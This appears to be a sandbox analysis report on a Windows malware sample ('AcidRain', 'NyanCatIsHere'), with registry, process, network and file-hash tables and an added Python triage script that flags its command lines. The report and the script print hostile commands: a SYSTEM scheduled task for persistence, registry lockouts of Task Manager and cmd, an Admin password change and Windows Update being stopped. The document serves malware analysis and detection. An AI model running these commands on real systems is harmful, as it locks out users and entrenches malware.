| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0c9f9cbe06cda01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\ = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.google.com | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz\Total = "65" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DOMStorage\mega.nz | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe | "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\AcidRain.exe" |
| C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe | "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe" |
| C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe | "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe" |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe" |
| C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\56D.tmp\Acid Rain.bat" " |
| C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" https://mega.nz/file/enh1BYrI#N5sD3k_HwM4hL3-l-w2Ahb6uP2I-LyVeKgGO-CmfJA0 |
| C:\Windows\SysWOW64\reg.exe | REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f |
| C:\Windows\SysWOW64\timeout.exe | Timeout 1 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:275457 /prefetch:2 |
| C:\Windows\SysWOW64\net.exe | net user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR |
| C:\Windows\SysWOW64\timeout.exe | Timeout 1 |
| C:\Windows\SysWOW64\net.exe | net stop wuauserv |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop wuauserv |
| C:\Windows\SysWOW64\timeout.exe | Timeout 1 |
| C:\Windows\SysWOW64\reg.exe | REG add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002 |
| C:\Windows\SysWOW64\timeout.exe | Timeout 50 |
| C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs" |
| C:\Windows\SysWOW64\timeout.exe | Timeout 65 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:668693 /prefetch:2 |
| C:\Windows\SysWOW64\mspaint.exe | mspaint |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:603155 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:603157 /prefetch:2 |
| C:\Windows\SysWOW64\timeout.exe | Timeout 5 |
| C:\Windows\SysWOW64\mspaint.exe | mspaint |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:3879974 /prefetch:2 |
| C:\Windows\SysWOW64\timeout.exe | Timeout 5 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:996383 /prefetch:2 |
| C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs" |
| C:\Windows\SysWOW64\timeout.exe | Timeout 5 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:868 CREDAT:996400 /prefetch:2 |
| C:\Windows\SysWOW64\timeout.exe | Timeout 5 |
| C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs" |
| C:\Windows\SysWOW64\timeout.exe | Timeout 55 |
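The command chain in the Processes section is built almost entirely from Windows' own binaries (schtasks, reg, net, timeout, wscript); what the report's signatures react to is the combination: a task registered to run as SYSTEM at boot whose action is an executable in the user's own Startup folder, Task Manager and the command prompt disabled through the Policies keys, the local Admin password changed and Windows Update stopped, and VBScript files executed from the Startup folder. The script below, added here as a worked example and not part of the sandbox report or the sample's own code, expresses those signatures as explicit rules and runs them over the command lines above (copied in as constructed sample input). The rule names, the `Finding` type and the regular expressions are this editor's own; `DisableRegistryTools` is included on the assumption that it is the policy value behind the report's "Disables RegEdit" signature, since no `reg add` for it appears in this section.

```python
"""Triage rules over Windows process command lines (added example; the rule names,
Finding type and regexes are this editor's own, not the report's or the sample's)."""
import re
from dataclasses import dataclass

# Constructed sample input: command lines copied from the report's Processes section.
SAMPLE_COMMAND_LINES = [
    r'schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe"',
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\56D.tmp\Acid Rain.bat" "',
    r'"C:\Program Files\Internet Explorer\iexplore.exe" https://mega.nz/file/enh1BYrI#N5sD3k_HwM4hL3-l-w2Ahb6uP2I-LyVeKgGO-CmfJA0',
    r'REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'net user Admin 888Z.QrK2T!ZDshw5jZ.QrK2T!ZDshw5jRR',
    r'C:\Windows\system32\net1 stop wuauserv',
    r'REG add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 00000002',
    r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs"',
]

STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
# Policy values behind the report's "Disables Task Manager" / "Disables RegEdit" signatures;
# DisableRegistryTools is assumed from the signature name, no reg add for it appears above.
POLICY_VALUES = {"disabletaskmgr": "DisableTaskMgr", "disablecmd": "DisableCMD",
                 "disableregistrytools": "DisableRegistryTools"}
FILE_HOSTS = {"mega.nz", "drive.google.com"}  # hosts present in the report's Network table


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str
    command_line: str


def tokens(cmd):
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def image_name(toks):
    """Basename of the executable, lower-cased, without a trailing .exe."""
    if not toks:
        return ""
    name = toks[0].rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def _arg_after(toks, switch):
    """Value following a switch such as /ru (matched case-insensitively); '' if absent."""
    low = [t.lower() for t in toks]
    i = low.index(switch) if switch in low else -1
    return toks[i + 1] if 0 <= i < len(toks) - 1 else ""


def rule_scheduled_task_as_system(toks):
    low = [t.lower() for t in toks]
    if image_name(toks) != "schtasks" or "/create" not in low:
        return None
    if _arg_after(toks, "/ru").lower() != "system":
        return None
    target = _arg_after(toks, "/tr")
    if USER_WRITABLE.search(target) or STARTUP_DIR.search(target):
        # SYSTEM-level task whose binary sits where the unprivileged user can overwrite it
        return ("scheduled_task_system_user_writable_target", target.rsplit("\\", 1)[-1])
    return ("scheduled_task_as_system", target)


def rule_policy_lockout(toks):
    if image_name(toks) != "reg" or len(toks) < 2 or toks[1].lower() != "add":
        return None
    value = _arg_after(toks, "/v").lower()
    return ("policy_lockout", POLICY_VALUES[value]) if value in POLICY_VALUES else None


def rule_net_command(toks):
    if image_name(toks) not in ("net", "net1") or len(toks) < 3:
        return None
    verb = toks[1].lower()
    if verb == "user" and len(toks) >= 4 and not toks[3].startswith("/"):
        return ("local_account_password_set", toks[2])  # net user <name> <password>
    if verb == "stop":
        return ("service_stopped", toks[2].lower())
    return None


def rule_script_from_startup(toks):
    if image_name(toks) not in ("wscript", "cscript"):
        return None
    for arg in toks[1:]:
        if STARTUP_DIR.search(arg):
            return ("script_in_startup_folder", arg.rsplit("\\", 1)[-1])
    return None


def rule_browser_to_file_host(toks):
    if image_name(toks) != "iexplore":
        return None
    for arg in toks[1:]:
        m = re.match(r"https?://([^/]+)/", arg)
        if m and m.group(1).lower() in FILE_HOSTS:
            return ("browser_opened_file_host", m.group(1).lower())
    return None


RULES = [rule_scheduled_task_as_system, rule_policy_lockout, rule_net_command,
         rule_script_from_startup, rule_browser_to_file_host]


def triage(command_lines):
    """Run every rule over every command line; one Finding per (rule, line) hit."""
    findings = []
    for cmd in command_lines:
        toks = tokens(cmd)
        for rule in RULES:
            hit = rule(toks)
            if hit:
                findings.append(Finding(hit[0], hit[1], cmd))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_COMMAND_LINES):
        print(f"{f.rule:45} {f.detail:25} {f.command_line[:70]}")
```

Run it as a script to list the hits. The separate `scheduled_task_system_user_writable_target` rule exists because a task running as SYSTEM is routine on an administered host, while one whose action the current user can overwrite is what the report flags as "Possible privilege escalation attempt". Creating a task with `/ru SYSTEM` already needs an elevated context, so a hit on that rule also tells you the batch file ran with administrative rights; and the `net user Admin <password>` hit means the victim's own account password was changed, which matters for the incident-response checklist as much as for detection.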
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.thisworldthesedays.com | udp |
| US | 8.8.8.8:53 | www.thisworldthesedays.com | udp |
| US | 64.91.240.248:443 | www.thisworldthesedays.com | tcp |
| US | 64.91.240.248:443 | www.thisworldthesedays.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ww12.thisworldthesedays.com | udp |
| US | 75.2.81.221:80 | ww12.thisworldthesedays.com | tcp |
| US | 75.2.81.221:80 | ww12.thisworldthesedays.com | tcp |
| US | 8.8.8.8:53 | parking.parklogic.com | udp |
| US | 67.225.218.50:80 | parking.parklogic.com | tcp |
| US | 67.225.218.50:80 | parking.parklogic.com | tcp |
| US | 8.8.8.8:53 | d38psrni17bvxu.cloudfront.net | udp |
| GB | 99.86.249.202:80 | d38psrni17bvxu.cloudfront.net | tcp |
| GB | 99.86.249.202:80 | d38psrni17bvxu.cloudfront.net | tcp |
| US | 8.8.8.8:53 | d25hvf57b1t0vp.cloudfront.net | udp |
| GB | 13.249.247.121:443 | d25hvf57b1t0vp.cloudfront.net | tcp |
| GB | 13.249.247.121:443 | d25hvf57b1t0vp.cloudfront.net | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| GB | 13.249.247.121:443 | d25hvf57b1t0vp.cloudfront.net | tcp |
| US | 8.8.8.8:53 | team.epccm19.com | udp |
| DE | 78.47.121.208:443 | team.epccm19.com | tcp |
| DE | 78.47.121.208:443 | team.epccm19.com | tcp |
| DE | 78.47.121.208:443 | team.epccm19.com | tcp |
| DE | 78.47.121.208:443 | team.epccm19.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | drive-thirdparty.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | drive-thirdparty.googleusercontent.com | tcp |
| GB | 216.58.201.97:443 | drive-thirdparty.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | content.googleapis.com | udp |
| US | 8.8.8.8:53 | blobcomments-pa.clients6.google.com | udp |
| GB | 142.250.187.234:443 | blobcomments-pa.clients6.google.com | tcp |
| GB | 142.250.187.234:443 | blobcomments-pa.clients6.google.com | tcp |
| GB | 142.250.187.234:443 | blobcomments-pa.clients6.google.com | tcp |
| GB | 142.250.187.234:443 | blobcomments-pa.clients6.google.com | tcp |
| GB | 142.250.187.234:443 | blobcomments-pa.clients6.google.com | tcp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | tcp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | tcp |
Files
\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
| MD5 | aacce8318a2e5f0a43c8cd50907d6d29 |
| SHA1 | fd5da11bbbcdb2421186626f461cb48fc634760c |
| SHA256 | 7217260d8d9c6b0b6c8b797f64c516d8ebe4db48dc8a5fced46eab9082378724 |
| SHA512 | 8991368b7e5391b37c4584eedddfbb4041ddc554acad9742b390aad7b5b4791c106d1068b7c9c29cda9e14bd62e5c36894318246c247576162c54f30076190b5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
| MD5 | b3904e987387ac3ff87b2d16e3e28156 |
| SHA1 | d575167f14fc84625b1525e8a0dfa27c514b1357 |
| SHA256 | 143bb189902ec44987f475f6fce4c0f90c072e5d732dae58b5f79a3c31b5f584 |
| SHA512 | a105063b598555d2b4c1a3950a7ac120ffc72ad362e6c76a364b48ff8c32e8daea48ef362b22aa62d848af1c20d3ef7c6536e717e874c6fad329ec0c22e9268f |
memory/2492-30-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\56D.tmp\Acid Rain.bat
| MD5 | 16a6fe0a61c21d85803c2b8383d5d3c2 |
| SHA1 | fec9adfac8c278c3dc548989a97c574ccdcb0934 |
| SHA256 | 1942dd34f70465202360d5f299e7160cea4d108ac4305a94dbabd9b97f4b7bd0 |
| SHA512 | 6dd03c5c69caf470584153e5e91ae074868e3002dcc76a07e1782c8d23fa8f309c09b0a50b787606be958f051ef0fdb67d24d0c91eee261549d6d60b857ce061 |
C:\Users\Admin\AppData\Local\Temp\Cab1008.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ea595fe17341a31c106879a429fac97e |
| SHA1 | 2b827f8d755b7e21f49c12e781d6c558bfe36f30 |
| SHA256 | ac366e140adbcb8fa04e72f961a2de781b21d9f67ec658a1cf092e848e88969c |
| SHA512 | 7e8190b2ea3150fd68c597f4d2c16d537878049d7212d3eab6d625de46f8ccf2334a1b28e8b9c966d2137a9798684683bfc17464b9d956dd6925a46d8265fb3b |
C:\Users\Admin\AppData\Local\Temp\Tar1319.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar1497.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 86b10cbdd497918ff0aeb9c06a11a713 |
| SHA1 | 4891b4feaeb882fd92b4dd1c31c1deff4a045cef |
| SHA256 | d4865d766342a1e4d563b76f7c4363c9e77cd6b47e74ec58fc999d8587cdc150 |
| SHA512 | a33af0a938eb2d6459c6df8c7b881b34ad12858d725fc7505c143073539fdaf63ad433c36ad8af36acb58a037210ac59ce00404f54b946ec989b08a4d807a3dc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\favicon[1].ico
| MD5 | 72f13fa5f987ea923a68a818d38fb540 |
| SHA1 | f014620d35787fcfdef193c20bb383f5655b9e1e |
| SHA256 | 37127c1a29c164cdaa75ec72ae685094c2468fe0577f743cb1f307d23dd35ec1 |
| SHA512 | b66af0b6b95560c20584ed033547235d5188981a092131a7c1749926ba1ac208266193bd7fa8a3403a39eee23fcdd53580e9533803d7f52df5fb01d508e292b3 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\q905y6j\imagestore.dat
| MD5 | 006ba94c143c7701c91f924ec5e6702b |
| SHA1 | efbac9bc38ebe20f7624ea7f4f7f44a41d310f07 |
| SHA256 | cc875dac375138b6d09ea962d6ded4c328c420a13b638505e5816b4f3a28bae5 |
| SHA512 | 3ed4fb1c2abfab8354f71c97c2614c81715a406357aa9a0e8461636c655d9748801a993ba86a06c78ddb6bf8ccf2afdac3733f67e77d62ab2fb272904ee9c518 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0cccab8f99317f455958246bd6b77eb9 |
| SHA1 | 8aa15be9cea6e4ed7574ac1066550d9d6f6b68ff |
| SHA256 | f8add85a2f16b2005efdebbb7fb1c1d79e13f2ed008d0d3f6546ab3354f047ca |
| SHA512 | fa83ede3348cef82908022671af525f3a0463475cc61d326f0da5f4f15de54e6b0b3781a036c25c2e5429b053e60c179eeac3dadb4ee420c998c0951e09b0983 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a9f6c56f513468e954eb20b5bff6c8c1 |
| SHA1 | a947b7636d85b29ec19b458d914cd592e0fe5902 |
| SHA256 | eba0eaf827b40b1a1761de3b5bc91f3387832f1c2767bd5770471aab5075d3ba |
| SHA512 | ebc66f985251c90b5fbca25dc2ba3ee0f245b2524103f3425d3949f03804abdaeee8a315cca75a7f8ecc2c5f4bbc6fb92d40adf3eafea2a4b56a40fc795d9996 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f05d55ce250e6b49d200608b7269fa7f |
| SHA1 | ab513802215e41ab3ee46fd5cc431099c427ee17 |
| SHA256 | e3e13706de4b04b7c43637064a73251e25388486762d43d3643b093f59db7ac8 |
| SHA512 | b982e11fecc148b11cde6a6333b0a3a3c9ee07fb6b1c25ff3744e97cfe88f01e7001b3ba34ee3d8bc197a0f50f7465093cb1ab3d54f18e7ef98507f31b96be10 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 81d5a978761adce99effc7a00269fbe6 |
| SHA1 | 42ba81fbcc16652fc12a1f106b3397cf394c289e |
| SHA256 | bc588f7345d957155c4a1955e43b3a6b473297ba51215e297f4da8f92413a4f2 |
| SHA512 | 5c36d98bafb0cd729cb3107cb38c65a7e1d1a79dbeb22b40234013a9dda6ea1072a579fa08107770fb3c9e5708255269eb0053038563bf767b6290f1a65a36ba |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a22a23013d68b7719bff3846a5fff253 |
| SHA1 | 40c3828149982f2337a2182518d6715bf67bcce9 |
| SHA256 | 0de104da5f722f1ea0d6ec24dda7744458f76229f7d1e0f8bd8e96b6a71b056d |
| SHA512 | 02f251c91535416360a01e19f2e8c9bd29be674d6fd7cd0754a387706365b616f5b7470bb8c3cada4e0a9986af40f25c7c675522ad009f94fb7fccc4700e4242 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5926081e87b8cfd439f67adaf7b89de0 |
| SHA1 | a800548a6a1837b7c8d83c02aed1cdf5c1c8a061 |
| SHA256 | a15669c332e51e476d57ecb4d3847f5b88232364211405f253e58122619496d8 |
| SHA512 | 82e7ae44b4b110b77528996304ead69a8bfc780a0c9a44d03168354c36abeeb857009298cb3782f27c3eb4a1eb650946ae155696be7b8d60b31c6cacdb903ec3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a0fed52f9c5b75ce0841455d67e067c9 |
| SHA1 | f89d05db6a691b221e95d3d67f8d2719f969631b |
| SHA256 | 1296940975108f19a947fec364bef5c8703d649103ed73d7c864827f699cd5fa |
| SHA512 | 93bf1e712421f8888bd478b39c57eb44511a865f4f06da1de35b6537b5d37afc529af4f156fa0fbc8cd77a039ea939647df264749324bb72826c795fd6157baf |
